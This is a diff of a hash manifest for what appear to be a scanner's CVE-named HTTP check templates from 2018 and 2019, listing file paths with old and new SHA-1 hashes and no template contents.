+http/cves/2018/CVE-2018-20011.yaml:79d677b37ab9129485afda9dfd854fe1f63b955e +http/cves/2018/CVE-2018-20462.yaml:a55ddd30bb6cea38c17829c9811d132851c808bc +http/cves/2018/CVE-2018-20463.yaml:e419ca329fc530bf8532a48363b1f94aa1ff872f http/cves/2018/CVE-2018-20470.yaml:51a0bbf988a86b6ed3ed575073f9cb96f728894b -http/cves/2018/CVE-2018-20526.yaml:32b4c204678da18d308d47f1338673168d528671 -http/cves/2018/CVE-2018-20608.yaml:8be5b8e1f168dd6f11ef69a9d34dc5c0422124fd -http/cves/2018/CVE-2018-20824.yaml:d1cb4403c8403e7c47c43c0ab08bf556d08d3a65 -http/cves/2018/CVE-2018-20985.yaml:aa6df86357813cd9d21b2981124cd088b3e51149 -http/cves/2018/CVE-2018-2392.yaml:7c88bf63a35bcf88a16c7651f499076a7098c8c5 -http/cves/2018/CVE-2018-2791.yaml:71ddb036a8233f27a657489787f9900b6c6b19cb -http/cves/2018/CVE-2018-2894.yaml:00ef10a172a8dffc6e60125ccdf788864ad8d851 -http/cves/2018/CVE-2018-3167.yaml:5b858d7785670662398f3e4d6668d60089cd2f0f -http/cves/2018/CVE-2018-3238.yaml:ad5228222254d60e05ebe389b35d22937fb16d07 -http/cves/2018/CVE-2018-3714.yaml:0b5852bf22e50c11be9c611d947e5c97f354be20 -http/cves/2018/CVE-2018-3760.yaml:b01a5bfb0542038168ad0129c05f05e8761729be -http/cves/2018/CVE-2018-3810.yaml:cb15e9b97a0884048eef656f981644317e6a61cf -http/cves/2018/CVE-2018-5230.yaml:23db5a5f0a584ce6813ae2ce424ea9effa13efc2 -http/cves/2018/CVE-2018-5233.yaml:5aae39c2a2eab19cbcbb85b14c805c25a4d47167 -http/cves/2018/CVE-2018-5316.yaml:e068d9a67992587f5a537abdf5591ddbac477eb8 -http/cves/2018/CVE-2018-5715.yaml:50629bec2b891758e67843228cd2bf43717523ee -http/cves/2018/CVE-2018-6008.yaml:3720785916c0903445519deae577bb9d6dfdcd82 -http/cves/2018/CVE-2018-6184.yaml:92c50eff4900f3be1753b27cc918cf6237e9502a -http/cves/2018/CVE-2018-6200.yaml:00cbeaa3a642dd0c3014a50115f35b2cb89ca766 -http/cves/2018/CVE-2018-6530.yaml:ecf184cb6a5cc5e6c9f4a3eca47baf0330d392eb -http/cves/2018/CVE-2018-6910.yaml:59c2537a3325b676d804333e4d7455d9e7eeaafe -http/cves/2018/CVE-2018-7251.yaml:dac006fd33f981dd84f4d11b1d0b8c1e10265508 -http/cves/2018/CVE-2018-7282.yaml:c003976893b76777e962f0e2dcf148a1d1b86916 -http/cves/2018/CVE-2018-7422.yaml:b0e20049c0b115f4d8f5b480d8fe0210aba5fc8f -http/cves/2018/CVE-2018-7467.yaml:040aa8692470e7c378f5276ef0f47ff9859719ab -http/cves/2018/CVE-2018-7490.yaml:a61c4fd48653c19997c9b1163286b7841e22d932 +http/cves/2018/CVE-2018-20526.yaml:be3b1066155a99ba0a57f060c53190e3f36f93fe +http/cves/2018/CVE-2018-20608.yaml:8d820972c3e53a770441f382e0210c05f90a7d60 +http/cves/2018/CVE-2018-20824.yaml:0b0340320d24cec50892f7f690e509f033b7e0df +http/cves/2018/CVE-2018-20985.yaml:f95c8c599dd64e3a636bf56f616f5f2338cdad29 +http/cves/2018/CVE-2018-2392.yaml:e0a52347858e953a3a756214b43a3f0483c973c0 +http/cves/2018/CVE-2018-2791.yaml:1e59b11304c857f8149ef4699935e1b6fd69ff97 +http/cves/2018/CVE-2018-2894.yaml:ea8eb403ddc1deb22a0a2dc7e530e2eec7514f91 +http/cves/2018/CVE-2018-3167.yaml:24e455c4a455ddd6ccab10ee398826ec13b808b2 +http/cves/2018/CVE-2018-3238.yaml:463e62aa9766163ed08980c1227e46afda249fc6 +http/cves/2018/CVE-2018-3714.yaml:301d5a6884c46e70190ab36475114d1a7503bdc5 +http/cves/2018/CVE-2018-3760.yaml:6bbf694e91a83f141be76cc418bdfeb14411e0fd +http/cves/2018/CVE-2018-3810.yaml:9ffc0fb78e95c3b52ea3679db4f4dd17bb20884c +http/cves/2018/CVE-2018-5230.yaml:a88ddee99cdd34dd1bc8c657e565a78e3d691b2f +http/cves/2018/CVE-2018-5233.yaml:61431b36868d7e17bb74bcd6d70092df0fd8ab27 +http/cves/2018/CVE-2018-5316.yaml:5b84e22da6911e3f4d34d7ab2850bb27709765da +http/cves/2018/CVE-2018-5715.yaml:996eb257be65f04b092dbf0a3a83d2ca80645d4e +http/cves/2018/CVE-2018-6008.yaml:f887b0bed0860dbad245c43d57f57406f1331b12 +http/cves/2018/CVE-2018-6184.yaml:01887440e1667203921d755a1cee1e4f45643271 +http/cves/2018/CVE-2018-6200.yaml:c58ca950cb299bcd935f39acd913f5efa2320342 +http/cves/2018/CVE-2018-6530.yaml:7909833e2bfe5c64b7d50da9bdf71588d5dc7e7d +http/cves/2018/CVE-2018-6910.yaml:660e834ceffaca9b60796890a03ef50f073d23c4 +http/cves/2018/CVE-2018-7251.yaml:b21ca2c04f6bfa275082285c38c7df88901282c2 +http/cves/2018/CVE-2018-7282.yaml:5cb39226efce0f8146ca255acf1d419b6ea1216b +http/cves/2018/CVE-2018-7422.yaml:ba08ca102ed4c0984f6f366ee10d5c98a077ad8e +http/cves/2018/CVE-2018-7467.yaml:39d46e78933acc34addf6dddbca800763f281934 +http/cves/2018/CVE-2018-7490.yaml:9b300b9a22774df6059b62bfb9d26d28332ffc4d http/cves/2018/CVE-2018-7600.yaml:2f0fd02f9ab28043580327a3eddd64df76b81639 http/cves/2018/CVE-2018-7602.yaml:f5a7e49ebd8210cbc8fd5f84d25822af63ca2b2b -http/cves/2018/CVE-2018-7653.yaml:9ce245146371b790b550c3e9c017bb9d9af62faf -http/cves/2018/CVE-2018-7662.yaml:4b91854b771089957f632bcb55587ec23a656e05 +http/cves/2018/CVE-2018-7653.yaml:e4e1b391bd2198d1d68e2bdc3d55bb9e7d6417e0 +http/cves/2018/CVE-2018-7662.yaml:55b2ae527b4215dc940b1b5401798a35e673fe10 http/cves/2018/CVE-2018-7700.yaml:c1d863001efafbc9c35d15d4aa8e02f06c02f087 -http/cves/2018/CVE-2018-7719.yaml:c7528dcf53b9a95571b1c147855b7d0945e8e98b +http/cves/2018/CVE-2018-7719.yaml:a5329cda0b790d3003df72dc888632f7d2422910 http/cves/2018/CVE-2018-8006.yaml:9eeb94b0ca21a837a60b1a3ea6db1bd0d29c2035 http/cves/2018/CVE-2018-8033.yaml:da2de37cd1207e8952ace35b90cf70299e86eab7 -http/cves/2018/CVE-2018-8715.yaml:845d7d1851068ca38817f47d694ec8a8c05c50e6 -http/cves/2018/CVE-2018-8719.yaml:ee023d37d2d7fd233476012534fe68d3460a9197 -http/cves/2018/CVE-2018-8727.yaml:fbf90cc6ae8e8298678219e797f51ca97fe14302 -http/cves/2018/CVE-2018-8770.yaml:8b4746d182174dc48789eaa092a34ac0baa1fe13 -http/cves/2018/CVE-2018-9118.yaml:75383183b5e9e3e867d7955601d323212d8f49d3 +http/cves/2018/CVE-2018-8715.yaml:823330f9b5b41ff6686951a6201c25734801be0a +http/cves/2018/CVE-2018-8719.yaml:d75cffb9b9463e8e2d009e184e42e9ce6cacac26 +http/cves/2018/CVE-2018-8727.yaml:12fc1c77d8d4eeb213c09c8f91f4b0a69acf8726 +http/cves/2018/CVE-2018-8770.yaml:d3dfd9d5ee8698dd0b71e0a07a728664dac4dcc2 +http/cves/2018/CVE-2018-9118.yaml:5c7696de1d36533a84d863462fd4d7ff1993112f http/cves/2018/CVE-2018-9161.yaml:6ed503cb53682774c45db067389d6363bd1fce00 -http/cves/2018/CVE-2018-9205.yaml:3b1926813d2975f2a032bb1dbb53a31d9462cb93 -http/cves/2018/CVE-2018-9845.yaml:afe705fa3ae698ce53b0deb18a68a94ad460b26e +http/cves/2018/CVE-2018-9205.yaml:13987ebe3373b51b15da6fb969e553b4a3676cb2 +http/cves/2018/CVE-2018-9845.yaml:fa53c28cf5159dcc6a6708e5d42068f931d1d574 http/cves/2018/CVE-2018-9995.yaml:45d8ad7e0437e42765dc1d06a85b3b36409f8eed -http/cves/2019/CVE-2019-0193.yaml:4a4d46004e853890893692773e5e911cfe42c031 -http/cves/2019/CVE-2019-0221.yaml:38101969b90c7b9ffff01c60d338832e4cd02e0c +http/cves/2019/CVE-2019-0193.yaml:bae1347a6f6ac73f1ea363226f98bf5e2b127e71 +http/cves/2019/CVE-2019-0221.yaml:e98aeddeb6830b4f78ab43501ef029dc5585b020 http/cves/2019/CVE-2019-0230.yaml:a12a8c7330d189d271b1ffa68d83698914509d00 http/cves/2019/CVE-2019-10068.yaml:34915d1e6965e9682696deab8d9dfdee3635688a -http/cves/2019/CVE-2019-10092.yaml:a3d4594078d489104b3631e02e5efc0a19de8d26 -http/cves/2019/CVE-2019-10098.yaml:9af0ac4213f972bcb2745f9894b01a7593d51a6d -http/cves/2019/CVE-2019-1010287.yaml:1b471d6b13e31c1d08cf46afa8dda7bd7e680d7e +http/cves/2019/CVE-2019-10092.yaml:435caf5384f6d342db8ff58ff8ae5b5255b6d899 +http/cves/2019/CVE-2019-10098.yaml:83692b7430c304ec0f84e17946ebce904ebb45e1 +http/cves/2019/CVE-2019-1010287.yaml:72395b193ed26e45446451646adcd4380ebf597a http/cves/2019/CVE-2019-1010290.yaml:b92f765905eaf168baac91689aab36f6b13ffc7e -http/cves/2019/CVE-2019-10232.yaml:f39b78f7d0b49401ac78083086c7b0002db7f5b2 -http/cves/2019/CVE-2019-10405.yaml:a06ffb509c3a9d38261d780183f06ace229368a7 -http/cves/2019/CVE-2019-10475.yaml:7786867b9153bd2e95b6ac5fa4642a347b2b35f3 +http/cves/2019/CVE-2019-10232.yaml:01f26d695efd233fec8b509792630097558206d5 +http/cves/2019/CVE-2019-10405.yaml:a161c2c02764141ce0b557b49a9c4d031e1a6b0f +http/cves/2019/CVE-2019-10475.yaml:ccbcd1454447b1f2e2375c678e7ceb8a8b51c747 http/cves/2019/CVE-2019-10692.yaml:e28e5f09feff59d56dd0a7f5dbd01aebe1641873 -http/cves/2019/CVE-2019-10717.yaml:7976c1cc37a4affa99a827aabc79e25ae18d9045 +http/cves/2019/CVE-2019-10717.yaml:f9e01ca838a7c9fdbfcb3d67f90aa50f403f091a http/cves/2019/CVE-2019-10758.yaml:71cd17bb5926abfd80a767b6744b925f4f361700 -http/cves/2019/CVE-2019-11013.yaml:61cc140cae91da9b826046e920cf71160bf2584b +http/cves/2019/CVE-2019-11013.yaml:38cec9b43c4df579a63429b710937a6e8669a727 http/cves/2019/CVE-2019-11248.yaml:6c5fdf8b35bc6d92879cfaff52524a244b485600 -http/cves/2019/CVE-2019-11370.yaml:fafd20cd07cd486f8758737a043d50b003e0328d +http/cves/2019/CVE-2019-11370.yaml:47e85d339f8df2f2afb89f8e5fbdde495ae9e2cc http/cves/2019/CVE-2019-11510.yaml:36f79bb9d27389e1a894aa2b924fc64bfcccb719 http/cves/2019/CVE-2019-11580.yaml:cdfaadbda0b62a145cf4f0e89a66f91749030391 http/cves/2019/CVE-2019-11581.yaml:8a1d93d659173964eb817219198d33474f4a16f2 http/cves/2019/CVE-2019-11869.yaml:c08eec538651e6badae1418a3aa88042917d9f84 http/cves/2019/CVE-2019-12276.yaml:723d835747906404c0713de79c4ee8bb414a45d4 http/cves/2019/CVE-2019-12314.yaml:b1aaebc052388c9f78f78f8e83fef4569dd3f8be -http/cves/2019/CVE-2019-12461.yaml:3feeb12dee125343a67b1e3ef05a2c6c3bcbc5b8 -http/cves/2019/CVE-2019-12581.yaml:735475cb3dee1f61c500911a4e47f4da0e853e11 -http/cves/2019/CVE-2019-12583.yaml:d9e1911ed74f9336e04ef73d517ea69040536a38 -http/cves/2019/CVE-2019-12593.yaml:5891cedf21b2ecd923a6791241b1e4cfc0f10073 -http/cves/2019/CVE-2019-12616.yaml:725521a0d76cc65c507f5e87caca835bd834a460 -http/cves/2019/CVE-2019-12725.yaml:99e4d224d1dcfc4941f16bc0347d40d19f1b8c75 -http/cves/2019/CVE-2019-12962.yaml:6f6afa9290e59f2655e62a7a798941e92aafd935 +http/cves/2019/CVE-2019-12461.yaml:44c84b18722721b7623e63fbb9eb36078887fabc +http/cves/2019/CVE-2019-12581.yaml:e2afbc7641a09efce18b0da92bb1a201a2ba29d3 +http/cves/2019/CVE-2019-12583.yaml:ba7c21c0172df8d80661b2d9649f4150ee28ed22 +http/cves/2019/CVE-2019-12593.yaml:b254c1191390f8022ac9d8a317861e7f41de3ff4 +http/cves/2019/CVE-2019-12616.yaml:d80d27c0c30d290df50e1875bfd5f85ec98012ca +http/cves/2019/CVE-2019-12725.yaml:cf35cf14010342b388c5c926b897aa4a6df37791 +http/cves/2019/CVE-2019-12962.yaml:7d473aba3e34f46ed33a1fc0aea963def10e5af3 http/cves/2019/CVE-2019-12985.yaml:661eb90d738a2a2400e8efa4ed1ed71289dccae0 http/cves/2019/CVE-2019-12986.yaml:84b49998ca169d9730d736bb688d8759856ec9e9 http/cves/2019/CVE-2019-12987.yaml:5d415d56f0d05c3cff94669a00c71eca64ca1916 http/cves/2019/CVE-2019-12988.yaml:a73bb971b2519fe98f6c7ca0653355c0e75d4a6f -http/cves/2019/CVE-2019-12990.yaml:c3dbdcb3ef1d652bdddb501e2f01df67dca3f4fc -http/cves/2019/CVE-2019-13101.yaml:6148fb3516f281f71ad6dedc6c03186aac83d526 -http/cves/2019/CVE-2019-13392.yaml:f6a63293507d9d7e4ea0eb8de4d912bd32e3e821 -http/cves/2019/CVE-2019-13396.yaml:5f9bd1387235e34da14457d657e5779d69e76bbf -http/cves/2019/CVE-2019-13462.yaml:b2dff5dde3e096d4335a13b99fe427eb31d9a808 -http/cves/2019/CVE-2019-14205.yaml:8246f1ddccb3417b7f635d93ab5812c8e5f3a4b9 -http/cves/2019/CVE-2019-14223.yaml:c446e6690710dbc1eaa773c9170d3138a91893a5 -http/cves/2019/CVE-2019-14251.yaml:63d87c54dd8aff75c45678319f687e1330ff5623 -http/cves/2019/CVE-2019-14312.yaml:ce406085fd52cf3b87c0179f70377b22fa1d37f0 +http/cves/2019/CVE-2019-12990.yaml:59c5d7177df551856e74bab49c29e1701b341c36 +http/cves/2019/CVE-2019-13101.yaml:93bd06d81e2420641531a165dab7bd2b0160ff8b +http/cves/2019/CVE-2019-13392.yaml:e5bda59eb5a4db2a84bd275d849085387a47c3a1 +http/cves/2019/CVE-2019-13396.yaml:648950151fd04534e453d8161146630d33431c8e +http/cves/2019/CVE-2019-13462.yaml:75a6f62299a94b10bd37aecfcc5702fa3399deaf +http/cves/2019/CVE-2019-14205.yaml:3b6aa96eacca1868de0a7292bf7cf0aa0521b7d0 +http/cves/2019/CVE-2019-14223.yaml:6d169596405b0a6d8a8a4cbef931a978994aa61a +http/cves/2019/CVE-2019-14251.yaml:d0c18521d8b2939ba68cdbbdc3552bb2035fcb66 +http/cves/2019/CVE-2019-14312.yaml:6ebd80f9de6576cc06221a7e16a71a595d3641f6 http/cves/2019/CVE-2019-14322.yaml:672c017e5dd6c438c330500c8a10553c92f535f9 -http/cves/2019/CVE-2019-14470.yaml:ae8f29327307e608b1204646e1a6bb57519ee2c5 -http/cves/2019/CVE-2019-14530.yaml:315a0ee3c78b225529fbb12eb4aadb6009df36b3 -http/cves/2019/CVE-2019-14696.yaml:73e498b5c2e671de3295c979da2ac4d6c70211dd -http/cves/2019/CVE-2019-14750.yaml:6b55b71900d74c11cb11dc0c25f54645fbdb7bc1 -http/cves/2019/CVE-2019-14789.yaml:1ac14a5efa6d26f84be8daf398a9bb8b03aed5b8 -http/cves/2019/CVE-2019-14974.yaml:923789894f159a746f862709f900cd64c035c6e6 +http/cves/2019/CVE-2019-14470.yaml:6536a429eb144997beb37b12fee00f3924cadbf9 +http/cves/2019/CVE-2019-14530.yaml:2ade517a280fb44ed2c2f65b699f8aa0788e17fa +http/cves/2019/CVE-2019-14696.yaml:3b5b1a29e95ee84d9e4830062b01aea252635b6c +http/cves/2019/CVE-2019-14750.yaml:99b83207e2956b48a23bc4b321887673c57af17c +http/cves/2019/CVE-2019-14789.yaml:0efad40323a18b578be180fe94babb5a982556e0 +http/cves/2019/CVE-2019-14974.yaml:9d97a05129ca044666fd6ea8c1c2176b8103a6a4 http/cves/2019/CVE-2019-15043.yaml:cedbfb48a49c206eb7155721a91d972046139e5b http/cves/2019/CVE-2019-15107.yaml:0caa920566e443f9e3ae10b819124b48bf19c577 -http/cves/2019/CVE-2019-15501.yaml:9ce29c61044dca1a62ad70e12c2e4e5aa646cd46 -http/cves/2019/CVE-2019-15642.yaml:01704c19f5c27fe2bdca24e11b0c1d232b3e1733 -http/cves/2019/CVE-2019-15713.yaml:088fd18a4693b628c150680a92095456430c7eb3 -http/cves/2019/CVE-2019-15811.yaml:46a163db887aa0a79fb1105da20a971a74b42d2d -http/cves/2019/CVE-2019-15829.yaml:68bf3f487e693904193a73aef1d46d8e91135ddd -http/cves/2019/CVE-2019-15858.yaml:8f7365f7cd5fc9e2d2a0b9e21c6d6d2dab9c6f68 -http/cves/2019/CVE-2019-15859.yaml:dcbff6319f10c5f04058c16ecf4e054d3c6d0862 -http/cves/2019/CVE-2019-15889.yaml:bafa13a7473cedc83d5a55d7c31b8aaece72d745 +http/cves/2019/CVE-2019-15501.yaml:574f86569845a39cfb84395f114095eb9534821b +http/cves/2019/CVE-2019-15642.yaml:438490bfa57313b5514a3f92750a12c7f6468697 +http/cves/2019/CVE-2019-15713.yaml:7a136aa59fc0e7cc277c8508a2d3551e5c678b53 +http/cves/2019/CVE-2019-15811.yaml:31ac913c5504cbb308c9ab5388c9ca724de04db9 +http/cves/2019/CVE-2019-15829.yaml:833e9979e4ef7c757c0896d2d2f849c96d875f85 +http/cves/2019/CVE-2019-15858.yaml:e55977062ccdb04a98be0c560182b05feb83b2f4 +http/cves/2019/CVE-2019-15859.yaml:05ed2c1f7ea1eda494286311f7d897e444e2ba13 +http/cves/2019/CVE-2019-15889.yaml:ef6b07871a0a21ec5a501defd91a787c9236b5b2 http/cves/2019/CVE-2019-16057.yaml:d24ec2b3815bbb7e0e702b8be13d5d7773884a6b http/cves/2019/CVE-2019-16097.yaml:0066fa99b60a1aef07243fccc69a75f3ca14dc7f -http/cves/2019/CVE-2019-16123.yaml:3ec0b46a7d8dd820aeda8f335f9b2e04c3d695d5 +http/cves/2019/CVE-2019-16123.yaml:8854e024e06bc06af55dc74b55136c7f3d88e51b http/cves/2019/CVE-2019-16278.yaml:61e898525462e512845a17fc3ca1dd5c07b98f53 -http/cves/2019/CVE-2019-16313.yaml:4b34836b12f0a72d1c71e92d6b2ba2d0412c459c -http/cves/2019/CVE-2019-16332.yaml:620bbda4b68c5791ed2d46fffbd6b8584bfc9e6c +http/cves/2019/CVE-2019-16313.yaml:ea8b28c31bd2194ebd748aca7f59d1710bd7154a +http/cves/2019/CVE-2019-16332.yaml:cb23b06df714f17944375bdd4e50e9d2b61f3671 http/cves/2019/CVE-2019-16525.yaml:9d4c899e92761fa6af2b5557b41b385a495bb461 http/cves/2019/CVE-2019-1653.yaml:9e347a5ccde409210fa1405799c0dac626118c5a http/cves/2019/CVE-2019-16662.yaml:c9b4f01ec8654736091cf91d87a68b85f9f39fdb http/cves/2019/CVE-2019-16759.yaml:970217cab18ec1954ebdbc242095d5c821f82088 -http/cves/2019/CVE-2019-16920.yaml:ab8acbc7885804b85352d08ff4f077e2e3570f09 -http/cves/2019/CVE-2019-16931.yaml:0fda67682d25719970f8695d308b13d1c14f98ae -http/cves/2019/CVE-2019-16932.yaml:99330f901cd8190a0bc6c4f827dc1ab02737043d -http/cves/2019/CVE-2019-16996.yaml:28fb47f97630ec450df87683d5973e1af486d214 -http/cves/2019/CVE-2019-16997.yaml:0456f3f78cf4e312fcd5915931c9da1ddf16a490 +http/cves/2019/CVE-2019-16920.yaml:3d4922f0e77fab56d11fed805fb32be7dd40c51a +http/cves/2019/CVE-2019-16931.yaml:62ed056c8a1c43a1feb922c5493e8813c9328498 +http/cves/2019/CVE-2019-16932.yaml:0dc1732f1d316ed0ba9538c53a5f8e83d3bc55a2 +http/cves/2019/CVE-2019-16996.yaml:fd3f1a5a972e52f2bda541e915e97ea9713375b6 +http/cves/2019/CVE-2019-16997.yaml:97f85d6ba4fff149d4e7dc8ad6329fcb4e155acc http/cves/2019/CVE-2019-17270.yaml:5f4b5e4462fbad79f3d5cf653e23e2f094ad7139 http/cves/2019/CVE-2019-17382.yaml:8143afd6ca12b88c3ed082e2e8921984b9c86a1a -http/cves/2019/CVE-2019-17418.yaml:256e9ba5790b183345903d551105933e88ec19d0 -http/cves/2019/CVE-2019-17444.yaml:6f452fe76cdb033f4a4182dd5904fdefe1acd67b -http/cves/2019/CVE-2019-17503.yaml:37b1d9dc95080e20c0381e2784d92cd7785b04da -http/cves/2019/CVE-2019-17506.yaml:05034ee7e87e43d9e4d7199da0109eac4c56725c -http/cves/2019/CVE-2019-17538.yaml:c297b04220118a93b140cc070d28f7dd1aed8cca +http/cves/2019/CVE-2019-17418.yaml:a59853c55c6dccaf10088e414739f0fa4ced4a50 +http/cves/2019/CVE-2019-17444.yaml:59c163129cdcaa36c3fb320e49492149291e9cf2 +http/cves/2019/CVE-2019-17503.yaml:4953891b191983f9d1dc47843366bd7b700d8c6d +http/cves/2019/CVE-2019-17506.yaml:9085386164474be775c40d2a839e188dda6e1ccf +http/cves/2019/CVE-2019-17538.yaml:a36c10fb9aa57d1063f480a70956c1184d8bcc74 http/cves/2019/CVE-2019-17558.yaml:5999a649e06f781cb530d1bd2e30dd2e8f844268 -http/cves/2019/CVE-2019-17574.yaml:be295be82e1a38d1a1d81a1e8f14e8e6b042b0af -http/cves/2019/CVE-2019-17662.yaml:9a666f68c48c157fe9403d55dc488bada8e7da5a +http/cves/2019/CVE-2019-17574.yaml:90c37c5a73c910f27e7cba9d516c04084cb8e74d +http/cves/2019/CVE-2019-17662.yaml:16e5700331d0e4a922da57c522118d3ecfb620a8 http/cves/2019/CVE-2019-1821.yaml:ed77f577eac58be3436e3e1fc7326619a38d9f9d http/cves/2019/CVE-2019-18371.yaml:4047cb6098c701b89313f969b2bc409b0b4885c9 -http/cves/2019/CVE-2019-18393.yaml:ff19d83180660b92cb7f7658068c3274365e6f11 -http/cves/2019/CVE-2019-18394.yaml:55096901d49d998acc7e38f6f51aeeb2e0cd6838 -http/cves/2019/CVE-2019-18665.yaml:1007cda9e63509f69c8dff8c8ffb2ea0a7ca8d53 +http/cves/2019/CVE-2019-18393.yaml:d562e8e465497b09505baae956b20695b9bc9135 +http/cves/2019/CVE-2019-18394.yaml:76ae2709c97d74213556c46ac7bf88210b178407 +http/cves/2019/CVE-2019-18665.yaml:77141d4353e3ef2fd420f8f0037b8ccccf985b65 http/cves/2019/CVE-2019-18818.yaml:c9414ee0f6d8156f4ef4608f69cb8555a790745c http/cves/2019/CVE-2019-18922.yaml:4ed637578c35fd8f98041c112f02564506250563 -http/cves/2019/CVE-2019-18957.yaml:0721c5cc253e0a54ca39e4921d5623946e156b1f -http/cves/2019/CVE-2019-1898.yaml:0f48860de4b16ef4d45b43d21bdf37d71c3b54fd +http/cves/2019/CVE-2019-18957.yaml:cd6b5dd05062cf7f521ed2c56562e02cff082fb5 +http/cves/2019/CVE-2019-1898.yaml:9a2f6295ee6b56c979a523582d5aaf1223fc25c6 http/cves/2019/CVE-2019-19134.yaml:90b60e3c103d3883f0013bf246f943437f3f8d22 -http/cves/2019/CVE-2019-19368.yaml:c77e565d2d97c5f297b1d0874d8466fd93bc8da7 -http/cves/2019/CVE-2019-1943.yaml:42c278095d1d3f91f0537d72e916c47f6c59bafc +http/cves/2019/CVE-2019-19368.yaml:f3304beb30500975f8420876fd32ff0f31c1320d +http/cves/2019/CVE-2019-1943.yaml:626d65ce203f050fcc7cd639fc1df848a468f48d http/cves/2019/CVE-2019-19781.yaml:3ff5b142aa5bba93e12b67e40d4d810b3f85f0f3 -http/cves/2019/CVE-2019-19824.yaml:efe1701d90d49f3fd5a32e369cee1a3f0aa2ad1e -http/cves/2019/CVE-2019-19908.yaml:b1ee5d253ba62aa6b02c96d2bdb7a4a915a868b1 -http/cves/2019/CVE-2019-19985.yaml:87ff5003d431ba5cf5a246139061cd9a5b36323f +http/cves/2019/CVE-2019-19824.yaml:8f44e0bd27447ea258599fa90e27b899bb1de792 +http/cves/2019/CVE-2019-19908.yaml:56a0c9a3fc40d55880a5f33c198d623028cf32cd +http/cves/2019/CVE-2019-19985.yaml:d8f9d739dd4af473808da00104c152e5531f1bc1 http/cves/2019/CVE-2019-20085.yaml:ed6f51542bee233dcca077015894c34f7634f2cf -http/cves/2019/CVE-2019-20141.yaml:70bfc19cf001cdcb324098300b713f9a30a0bebf -http/cves/2019/CVE-2019-20183.yaml:3740a3ecbf5147649155c405b53a9522dd56ce36 -http/cves/2019/CVE-2019-20210.yaml:1c0f1f3254cb38ae0bb38e01ecc6e77f04ec3917 +http/cves/2019/CVE-2019-20141.yaml:897e68249dcdd01ffbd0cc2b77f37502523f4f23 +http/cves/2019/CVE-2019-20183.yaml:192f0e91a16b73127dfd4c38b7ed595a56208d17 +http/cves/2019/CVE-2019-20210.yaml:5bd5cba6ef06f5c1b734938ec45e578405f3205e http/cves/2019/CVE-2019-20224.yaml:bd5cfbc7024931f8be73d447841bb0b6b80de750 -http/cves/2019/CVE-2019-20933.yaml:17564107c645f38c4aea6e7fd29628e0ac7430f3 -http/cves/2019/CVE-2019-2578.yaml:301998593ca4b58e158b1f9b8216f19880a914de -http/cves/2019/CVE-2019-2579.yaml:f878fff98fbce1ca0a1c0217eac675bddeee0821 -http/cves/2019/CVE-2019-2588.yaml:d316f92dba3bf6b4bf6d2ea9b8baba3c204acc43 -http/cves/2019/CVE-2019-2616.yaml:4278685ad581f74411f3b5e5fddc02b1b703886d +http/cves/2019/CVE-2019-20933.yaml:6e9650ee6ef57f155ab445936103ebaaa46b0f1a +http/cves/2019/CVE-2019-2578.yaml:320e2e982e6d587db3d4238bf29b752401c8299a +http/cves/2019/CVE-2019-2579.yaml:7560df89b9238aa380c4dabe7ec54d6be05f9cd7 +http/cves/2019/CVE-2019-2588.yaml:adf9ca90bdddd06e800732e62574b40d08e333fb +http/cves/2019/CVE-2019-2616.yaml:ed782755570b3ef2ff81ed16fd785cb24990770a http/cves/2019/CVE-2019-2725.yaml:22b86011e9796d41e1d97ac5c78d0e153a2e539b http/cves/2019/CVE-2019-2729.yaml:01dc0791d7817a41e8958d9d90b0522ff5c85a15 -http/cves/2019/CVE-2019-2767.yaml:77a3b10d3bd9c188cb9e77c61991fb1182170ed5 +http/cves/2019/CVE-2019-2767.yaml:eb724ce8fd63ec49545e7cff20c97e007e7f7d32 http/cves/2019/CVE-2019-3396.yaml:8443caeaea63117cd1a6d64364a9480e11348860 http/cves/2019/CVE-2019-3398.yaml:24c61566c06c093afffa8c531550167cb6e7c815 -http/cves/2019/CVE-2019-3401.yaml:87a4023c084a8ec0b7dee1be26dc864e9eca7fca -http/cves/2019/CVE-2019-3402.yaml:8943cf764b61bb77e8f7bd5f41bca92ea29c24fc -http/cves/2019/CVE-2019-3403.yaml:30a781f64a73d58c0c992ad13df99f9dca687126 +http/cves/2019/CVE-2019-3401.yaml:da7b8c1913b56e5bddac9d565e466af190ed1497 +http/cves/2019/CVE-2019-3402.yaml:e3601b7babab09061b554444b1bebb30d052fe21 +http/cves/2019/CVE-2019-3403.yaml:07ab4833751177ced20f82319649d5e5146d4595 http/cves/2019/CVE-2019-3799.yaml:ff6dc001d90d37e49ce712982d432b922b5982a7 -http/cves/2019/CVE-2019-3911.yaml:e7b1a18ec7e281f5779cdfb993a332428b8c634a -http/cves/2019/CVE-2019-3912.yaml:985debabae955a1a5e4e64365840324fb6e4b9d3 -http/cves/2019/CVE-2019-3929.yaml:85750c0f1c5280816e8bf476cbf589d43415608c -http/cves/2019/CVE-2019-5127.yaml:966fc30118db2109f6c63354f204a6b7583da87c +http/cves/2019/CVE-2019-3911.yaml:97a79da80dc0d6142004b2c83637c8f63d049027 +http/cves/2019/CVE-2019-3912.yaml:0ec65aa6dffa976ddf08000ffc2f904252834dae +http/cves/2019/CVE-2019-3929.yaml:b0cd50f5d002ede970d5a5d9bcde7a71f37cb434 +http/cves/2019/CVE-2019-5127.yaml:1b072376a93c75e45b664b6f389ee62594e8ded1 http/cves/2019/CVE-2019-5418.yaml:9407399ba5d7cf5d58c78522aaa1d6d8ea2cd0d0 http/cves/2019/CVE-2019-5434.yaml:9a829a91baea7c5bce99416e21190e53cd543da9 -http/cves/2019/CVE-2019-6112.yaml:2ea2dc0a7ac463b6d4bce0e1846e3ffb1f8f6c67 +http/cves/2019/CVE-2019-6112.yaml:8327ba7426493a10536830eda212c0c5f0e4d5e1 http/cves/2019/CVE-2019-6340.yaml:6b2b8e4ffe1a45b340cd89f6b3362d5cfc62050a http/cves/2019/CVE-2019-6715.yaml:ed7f8391d63bafa82c500c92d741467d8835d938 -http/cves/2019/CVE-2019-6799.yaml:3ae92579b32ec3498325afcb15efe2bab4de2118 -http/cves/2019/CVE-2019-6802.yaml:85bb2778a9f6a49eb06e9cd74e7caae560a09b74 +http/cves/2019/CVE-2019-6799.yaml:e21a772e7ec3a872c96808eb99fc41b54cb07401 +http/cves/2019/CVE-2019-6802.yaml:360030e4aa3afab15a34103e71d44a6176a3aa99 http/cves/2019/CVE-2019-7192.yaml:4a92c5d7b7d6ea79e6b742eb3af784ecdcef27cb -http/cves/2019/CVE-2019-7219.yaml:a2ed8b5da35e117fe2474e274f1643187c67c34e +http/cves/2019/CVE-2019-7219.yaml:4ea8d85d4567ee9c90d5236e18214d9e6cb040d6 